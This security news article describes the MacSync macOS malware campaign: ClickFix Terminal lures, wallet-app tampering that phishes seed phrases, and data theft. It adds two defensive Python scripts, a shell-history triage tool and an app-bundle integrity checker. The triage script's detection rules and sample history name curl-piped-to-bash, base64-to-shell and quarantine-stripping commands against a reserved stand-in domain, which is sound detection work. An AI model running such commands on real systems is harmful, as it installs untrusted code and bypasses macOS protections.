
A new cyber threat campaign has emerged in the macOS ecosystem, relying not on sophisticated exploits but rather on tried-and-true social engineering tactics. Behind this threat is the MacSync malware, which is being distributed via a Malware-as-a-Service (MaaS) model—an inexpensive service catering to cybercriminals, including less experienced but highly active malicious actors. MacSync disguises itself as an installer for cloud storage services and spreads through websites that bear a striking resemblance to legitimate download portals. In one instance documented by CloudSEK experts, the user was initially redirected from a page imitating a Microsoft account login form, and subsequently to what appeared to be the “official” site for a macOS application. No suspicious files were immediately offered. Instead, visitors were presented with an error message recommending an “advanced installation method” via the Terminal.
What followed was a classic ClickFix maneuver. The user was persuaded to copy and paste a single command line into Terminal, supposedly needed to complete the setup or fix the reported failure. The command looked harmless but fetched a remote script and executed it. Because the user ran it themselves, macOS's download protections never came into play: Gatekeeper and notarization checks act on files carrying the com.apple.quarantine attribute, which browsers and other quarantine-aware apps set on downloads, whereas a script fetched by curl and piped straight into a shell is never quarantined and is often never written to disk as a file at all. Code-signature verification is equally irrelevant, since there is no signed binary to evaluate; the script simply runs with the logged-in user's privileges.
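The ClickFix step leaves a trace that defenders can look for: the pasted one-liner ends up in the user's shell history (zsh on a default macOS install) and in any process telemetry that records Terminal child processes. The following added example, which is not code from CloudSEK or from the MacSync campaign, triages history lines for the shapes such one-liners take: a remote fetch piped into an interpreter, a fetch hidden inside command substitution, an inline base64 payload decoded into a shell, quarantine attributes being stripped, and Gatekeeper being switched off. The sample history lines are constructed for illustration, the domain example.invalid is reserved and does not resolve, and none of them is the command actually used by the campaign.

```python
"""Heuristic triage of shell history for ClickFix-style one-liners.

Added example, not code from CloudSEK or the MacSync campaign. The sample
history lines below are constructed for illustration; they are not the command
the campaign used, and example.invalid is a reserved, non-resolving domain.
"""
import re

# (rule name, pattern). Patterns run case-insensitively over the whitespace-
# normalised command line.
RULES = [
    # curl/wget output piped (possibly via further stages) into an interpreter
    ("remote_fetch_piped_to_interpreter",
     r"\b(curl|wget)\b.*\|\s*(sudo\s+)?(bash|sh|zsh|python3?|perl|osascript)\b"),
    # the fetch happens inside $(...) or backticks, e.g. bash -c "$(curl ...)"
    ("remote_fetch_in_command_substitution",
     r"(\$\(|`)\s*(curl|wget)\b"),
    # inline payload decoded and piped into a shell
    ("base64_decode_piped_to_interpreter",
     r"\bbase64\s+(-d|-D|--decode)\b[^|]*\|\s*(sudo\s+)?(bash|sh|zsh|python3?)\b"),
    # clearing extended attributes removes com.apple.quarantine, so Gatekeeper never sees the file
    ("quarantine_attribute_removed",
     r"\bxattr\b[^|;&]*(\s-[a-z]*c[a-z]*\b|com\.apple\.quarantine)"),
    # Gatekeeper switched off outright
    ("gatekeeper_disabled",
     r"\bspctl\s+--(master|global)-disable\b"),
]
COMPILED = [(name, re.compile(pat, re.IGNORECASE)) for name, pat in RULES]

# zsh EXTENDED_HISTORY lines look like ': <epoch>:<duration>;<command>'
ZSH_EXTENDED = re.compile(r"^: \d+:\d+;(.*)$")


def strip_zsh_prefix(line: str) -> str:
    """Return the bare command from a zsh history line (plain or extended format)."""
    m = ZSH_EXTENDED.match(line)
    return m.group(1) if m else line


def scan_command(cmd: str) -> list[str]:
    """Return the names of every rule the command line trips (empty if none)."""
    normalised = " ".join(strip_zsh_prefix(cmd).split())
    return [name for name, rx in COMPILED if rx.search(normalised)]


def triage(history_lines) -> dict[str, list[str]]:
    """Map each flagged command to the rules it tripped; clean lines are omitted."""
    report = {}
    for line in history_lines:
        cmd = strip_zsh_prefix(line)
        hits = scan_command(cmd)
        if hits:
            report[cmd] = hits
    return report


# Constructed sample history: two routine commands, four ClickFix-shaped ones.
SAMPLE_HISTORY = [
    "brew install wget",
    "curl -O https://example.invalid/release-1.2.tar.gz",
    ": 1700000000:0;curl -fsSL https://example.invalid/install.sh | bash",
    'bash -c "$(curl -fsSL https://example.invalid/fix)"',
    "echo aGVsbG8= | base64 -D | sh",
    "xattr -cr /Applications/Foo.app && open /Applications/Foo.app",
]

if __name__ == "__main__":
    for cmd, hits in triage(SAMPLE_HISTORY).items():
        print(f"{', '.join(hits):45} {cmd}")
```

Run it against `~/.zsh_history` (or the command-line field of your EDR's process events) rather than the constructed sample. Two caveats: a plain download such as `curl -O` is deliberately not flagged, because the quarantine bypass only materialises when the content is executed, and regex rules are trivially evaded by quoting tricks or variable indirection, so pair this with telemetry that alerts on Terminal spawning curl whose output feeds a shell regardless of how the text was typed.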
After installation, MacSync is slow to reveal its presence. The malware operates discreetly, prioritizing long-term persistence on the system. One of its primary functions is tampering with the locally installed copies of popular Electron-based companion applications for hardware cryptocurrency wallets, such as Ledger Live and Trezor Suite. The modified apps keep their legitimate appearance but, at a chosen moment, display "service" screens that report a failure and offer a recovery process. This can be triggered weeks after the initial infection. The user is then asked to enter their PIN and seed phrase, supposedly to fix the problem, and once they do the attackers have full control of the assets. A trusted application is effectively turned into a carefully crafted phishing instrument. The tell is simple: no hardware wallet companion app needs the seed phrase to recover from a sync or update error, so any in-app screen that asks for it to "fix" a problem is malicious, however genuine the rest of the application looks.
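Because the phishing screen lives inside a modified app rather than a web page, the defensive check is file integrity. On a Mac the first step is `codesign --verify --deep --strict` against the bundle, since Apple's code-signing seal covers everything under Contents/Resources and a rewritten Electron archive breaks it. The following added example, which is not code from CloudSEK, Ledger or Trezor, complements that with a hash manifest: baseline a freshly installed bundle, keep the manifest off the host, and later diff the bundle against it to learn exactly which files were modified, added or removed. The `Wallet.app` layout it builds is constructed to mimic an Electron bundle for illustration only; nothing here describes how MacSync itself alters the real applications.

```python
"""Integrity baseline for an app bundle's resources.

Added example, not code from CloudSEK, Ledger or Trezor. It hashes every file
under a bundle directory, stores the manifest, and later reports files that were
modified, added or removed. The fake bundle built by make_fake_bundle() is
constructed for illustration; its file names only mimic an Electron layout.
"""
import hashlib
import json
import tempfile
from pathlib import Path


def hash_file(path: Path) -> str:
    """SHA-256 of a file, streamed so large asar archives are not read into memory at once."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(bundle: Path) -> dict[str, str]:
    """Map each regular file (bundle-relative, POSIX separators) to its SHA-256."""
    return {
        p.relative_to(bundle).as_posix(): hash_file(p)
        for p in sorted(bundle.rglob("*"))
        if p.is_file()
    }


def compare(baseline: dict[str, str], current: dict[str, str]) -> dict[str, list[str]]:
    """Diff two manifests into sorted lists of modified, added and removed paths."""
    return {
        "modified": sorted(p for p in baseline if p in current and baseline[p] != current[p]),
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
    }


def save_manifest(manifest: dict[str, str], dest: Path) -> None:
    """Persist the manifest as JSON; keep this copy off the host being checked."""
    dest.write_text(json.dumps(manifest, indent=2, sort_keys=True))


def load_manifest(src: Path) -> dict[str, str]:
    return json.loads(src.read_text())


def make_fake_bundle(root: Path) -> Path:
    """Lay out a minimal Electron-style bundle with constructed contents (not a real app)."""
    bundle = root / "Wallet.app"
    res = bundle / "Contents" / "Resources"
    (res / "app.asar.unpacked" / "node_modules").mkdir(parents=True)
    (bundle / "Contents" / "MacOS").mkdir()
    (bundle / "Contents" / "MacOS" / "Wallet").write_bytes(b"\xcf\xfa\xed\xfe constructed stub")
    (res / "app.asar").write_bytes(b"ASAR constructed archive v1")
    (res / "app.asar.unpacked" / "node_modules" / "native.node").write_bytes(b"constructed")
    return bundle


def demo() -> dict[str, list[str]]:
    """Baseline a fresh bundle, tamper with it the way a wallet-phishing implant
    might (rewrite the packed JS, drop an extra script), and return the diff."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        bundle = make_fake_bundle(root)
        manifest_path = root / "Wallet.manifest.json"
        save_manifest(build_manifest(bundle), manifest_path)

        res = bundle / "Contents" / "Resources"
        (res / "app.asar").write_bytes(b"ASAR constructed archive v1 + injected recovery screen")
        (res / "app.asar.unpacked" / "inject.js").write_text("// constructed\n")

        return compare(load_manifest(manifest_path), build_manifest(bundle))


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

The manifest approach has one advantage over the signature check alone: if an implant re-signs the modified bundle with an ad-hoc identity, `codesign --verify` can pass while the diff still names the rewritten `app.asar`. It only works if the baseline was taken before the machine was exposed, which is why the manifest belongs in change management for the fleet, not on the endpoint.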
Despite being marketed as a “cheap MaaS solution,” MacSync’s capabilities are formidable. The malware can exfiltrate browser data, cryptocurrency wallet data, Keychain contents and arbitrary files from disk. That makes it a significant risk not only for individual users but also for corporate fleets, where macOS is increasingly used as a work platform and a user's Keychain can hold corporate credentials and certificates.